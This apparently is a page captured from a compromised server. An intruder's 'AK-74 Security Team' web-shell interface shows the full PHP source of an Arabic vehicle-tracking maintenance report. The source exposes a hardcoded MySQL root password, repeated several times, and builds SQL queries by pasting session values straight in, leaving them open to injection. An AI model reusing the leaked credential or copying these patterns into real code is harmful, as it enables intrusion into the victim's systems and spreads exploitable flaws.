.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? session_start(); include ('init.php'); include ('func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); //setUserSessionSettings($_SESSION["user_id"]); //setUserSessionUnits(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="saudiex.com.sa"> <title>السيارات التى بحاجه لصيانه</title> <script type="text/javascript"> function MM_jumpMenu(targ, selObj, restore) { //v3.0 eval(targ + ".location='" + selObj.options[selObj.selectedIndex].value + "'"); if (restore) selObj.selectedIndex = 0; } </script> </head> <?php ?> <body vlink="purple" link="blue" class="xl70"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr align="center"> <td width="200px"><p align="right">تاريخ <?php echo date("m-d-Y"); ?></p> <p align="right">عدد السيارات <span id="count" style="color:red"></span>/<?php echo getcount(); ?> </p></td> <td><div align="center"><a href="http://www.digimapavl.com" target="_blank"><img src="logo.png" width="60" height="50" style="padding-left: 21px; padding-bottom: 10px;"></img> </a><br> <a HREF="javascript:window.print()" title="طباعه"><img src="printer.png" width="20" height="20"></a> <a onclick="tableToExcel('dvData', '<?php echo 'Zones' . date("20y-m-d"); ?>')" title="تصدير اكسيل"><img src="xls.png" width="20" height="20"></img></a> </div></td> <td width="250px"><p align="right">الخريطة الرقمية لتتبع المركبات</p> <p align="right">سيارات صيانه </p> <p align="right"><?php echo ' '.$_SESSION['username'].' ';?>حساب </p></td> </tr> </table> <!--2nd table--> <table width="100%" border="1" id="dvData"> <tbody> <tr > <td bgcolor="#0000FF" width="150px"><div align="right" class="style1"> <div align="right" style="font-size: 14px;color:white;">التاريخ</div> </div></td> <td bgcolor="#0000FF" width="200px"><div align="right" class="style1"> <div align="right" style="font-size: 14px;color:white;">اسم السياره</div> </div></td> <td bgcolor="#0000FF" width="200px"><div align="right" class="style1"> <div align="right" style="font-size: 14px;color:white;">موقع السياره</div> </div></td> </tr> <?php $date = date("Y-m-d"); $newdate = strtotime('-6 day', strtotime($date)); $_POST['Date'] = date('Y-m-d', $newdate); $select=" select gut.group_id,gu.username,gu.price,gu.price,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gt.device,gt.name,gt.sim_number FROM gs_objects as gt INNER JOIN gs_user_objects as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gt.dt_tracker <='" . $_POST['Date'] . "' AND gu.username='" .$_SESSION['username']. "' ORDER BY gt.dt_tracker DESC "; $select2 = "select gut.group_id,gu.username,gu.price,gu.price,gt.dt_tracker,gt.lat,gt.lng,gt.imei,gt.speed,gut.device,gut.sim_number,gut.`name` FROM gs_trackers as gt INNER JOIN gs_user_trackers as gut ON gt.imei=gut.imei INNER JOIN gs_users as gu ON gu.id=gut.user_id WHERE gu.id='" . $_SESSION['user_id']. "' AND gt.dt_tracker <= '" . $_POST['Date']. "' ORDER BY gt.dt_tracker DESC"; set_time_limit(5000); set_time_limit(5000);$con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs"); mysqli_set_charset($con, 'utf8'); $result = mysqli_query($con, $select); ?> <?php $i = 0; while ($row = mysqli_fetch_array($result)) { ?> <tr align="right"> <td><div align="right"><?php echo $row['dt_tracker']; ?></div></td> <td><div align="right"><?php echo $row['name']; ?></div></td> <td><div align="right"> <?php if (!empty($row['lat']) || !empty($row['lng'])) getPlaceName($row['lat'], $row['lng']); ?> </div></td> </tr> <?php $i++; } ?> <script> document.getElementById("count").innerHTML = "<?php echo $i; ?>"; </script> <?php function getPlaceName($latitude, $longitude) { //This below statement is used to send the data to google maps api and get the place //name in different formats. we need to convert it as required. $geocode = file_get_contents('http://maps.googleapis.com/maps/api/geocode/json?latlng=' . $latitude . ',' . $longitude . '&sensor=false&language=ar'); $output = json_decode($geocode); //Here "formatted_address" is used to display the address in a user friendly format. if (!empty($output->results[0]->formatted_address)) // echo $output->results[0]->formatted_address; echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>" . $output->results[0]->formatted_address . "</a>"; else { $geocode2 = file_get_contents('http://maps.googleapis.com/maps/api/geocode/json?latlng=' . $latitude . ',' . $longitude . '&sensor=false'); $output = json_decode($geocode2); if (!empty($output->results[0]->formatted_address)) echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>" . $output->results[0]->formatted_address . "</a>"; else { echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>$latitude °, $longitude°</a>"; } } } function getPlaceNameold2($latitude, $longitude) { echo "<a href='http://maps.google.com/maps?q=$latitude,$longitude&t=m' target='_blank' style='text-decoration:none'>$latitude °, $longitude°</a>"; } function getgroup($id) { $query = "SELECT gs_user_object_groups.group_name FROM gs_user_object_groups WHERE gs_user_object_groups.group_id='" . $id . "'"; set_time_limit(5000);$con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs"); mysqli_set_charset($con, 'utf8'); $result = mysqli_query($con, $query); while ($ro = mysqli_fetch_array($result)) { return $ro[0]; } } function getcount() { $q = "SELECT * FROM `gs_user_objects` WHERE `user_id`='" . $_SESSION['user_id']. "'"; set_time_limit(5000);$con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs"); mysqli_set_charset($con, 'utf8'); $r = mysqli_query($con, $q); $num_rows = mysqli_num_rows($r); return $num_rows; } ?> </tbody> </table> </body> <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script> <script type="text/javascript"> var tableToExcel = (function() { var uri = 'data:application/vnd.ms-excel;base64,' , template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines/></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--></head><body><table>{table}</table></body></html>' , base64 = function(s) { return window.btoa(unescape(encodeURIComponent(s))) } , format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = {worksheet: name || 'Worksheet', table: table.innerHTML} window.location.href = uri + base64(format(template, ctx)) } })() </script> </html>
Rename:
-